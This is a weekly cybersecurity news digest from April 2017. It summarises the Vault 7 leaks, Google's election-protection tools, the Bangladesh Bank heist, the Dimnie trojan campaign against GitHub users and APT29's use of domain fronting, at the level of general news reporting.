CyberSecurity Pulse 2017-04-4

CyberSecurity Pulse 2017-04-4

“If you set your goals ridiculously high and it’s a failure, you will fail above everyone else’s success.”
James Cameron

Analyst Insight

New Episodes in Vault 7 Case

In the last two weeks, Wikileaks has leaked new details about Vault 7, the name of the collection of documents allegedly linked to the Central Intelligence Agency, detailing a range of malware and hacking tools that can be used to turn phones and TVs into spying devices amongst other tools and utilities. In this sense, Cisco Systems has already confirmed that more than 300 models of switches it sells were containing a critical vulnerability that would have allowed the CIA to use a simple command to remotely execute malicious code that could take full control of the affected devices.

CyberSecurity Pulse 2017-04-4On the other hand, a set of files named DarkMatter has been released and consists of user manuals and other documentation for exploits mainly targeting Apple MacBooks. It exploited the Thunderbolt interface to allow anyone with physical access to a MacBook to bypass password protection on firmware and install one of a series of Apple-specific CIA implants. In the same way, WikiLeaks has released the third batch of the CIA Vault7 archive that shed light on several anti-forensics tools codenamed Marble which were being used by the intelligence agency to hamper forensic investigators and threat intelligence companies from attributing viruses, Trojans and hacking attacks to actors linked in one way or another to the CIA.

Wikileaks has done nothing but start. According to Julian Assange, the visible head of the organization, it has already contacted the affected companies so that the rest will know the consequences of the vulnerabilities already disclosed by the organization in past (and future) releases of documents.

» More information at Wikileaks

Top Stories

A Cybersecurity Arsenal That Will Help Protect Your Election

CyberSecurity Pulse 2017-04-4Jigsaw and Google, both divisions of Alphabet, are launching a suite of cybersecurity tools called "Protect Your Election". They hope to provide a set of free cyberdefenses that can support the independent news outlets, election monitoring and audit groups, activists, and human rights organizations that help elections run smoothly. The innovation in this case is not the innovation degree of the tools themselves, but the fact of deciding to package them in a way that makes them accessible to the people who these companies feel that will need these tools most. Packaging tools together like this, with a very clear targetted audience, sends a valuable message to a group that increasingly needs it while gaining visibility as security-concerned companies.

» More information at Wired

U.S. May Accuse North Korea in Bangladesh Cyberheist

CyberSecurity Pulse 2017-04-4US prosecutors are working on building a series of cases that would accuse North Korea of directing the theft of 81 million dollars from Bangladesh Bank's account at the Federal Reserve Bank of New York last year, and that would charge alleged Chinese middlemen to help with the operations. Richard Ledgett, deputy director of the US National Security Agency, publicly suggested that North Korea may be linked to the incident, while other private firms have long pointed the finger at the Democratic People's Republic of Korea. The current cases being pursued may not include concrete charges against North Korean officials, but anyway it cannot be discarded that they may implicate the country.

» More information at Reuters

Rest of the Week´s News

HTTPS Interception Weakens TLS Security

Organizations that have performed a risk assessment and determined that HTTPS inspection is a requirement should ensure their HTTPS inspection products are performing correct transport layer security (TLS) certificate validation. Products that do not properly ensure secure TLS communications and do not convey error messages to the user may further weaken the end-to-end protections that HTTPS aims to provide.

» More information at US-CERT

Widespread Email Scam Targets Github Developers with Dimnie Trojan

Dimnie is a trojan that has been targeted Russians until early this year, when a new campaign took aim at multiple owners of Github repositories. One commenter in a thread reported the initial infection e-mail was sent to an address that was used solely for Github. The e-mails attached a Microsoft Word document that contained a malicious macro in charge of launching PowerShell commands to download and execute the payloads themselves.

» More information at Ars Technica UK

APT29 Group Used Domain Fronting to Evade Detection

Security firm FireEye has revealed that APT29 have been using a technique called domain fronting to make hard the attribution of their attacks. This technique hides the remote endpoint of a communication. Domain fronting works at the application layer, using HTTPS, to communicate with a forbidden host while appearing to communicate with some other host which is already permitted by the censor.

» More information at Security Affairs

Further Reading

Fake Mobile Base Stations Spreading Malware in China

» More information at The Register

Ransomware Scammers Exploited Safari Bug to Extort Porn-viewing iOS Users

» More information at Ars Technica UK

Let's Encrypt SSL Certificates Issued to PayPal Phishing Sites

» More information at Bleeping Computer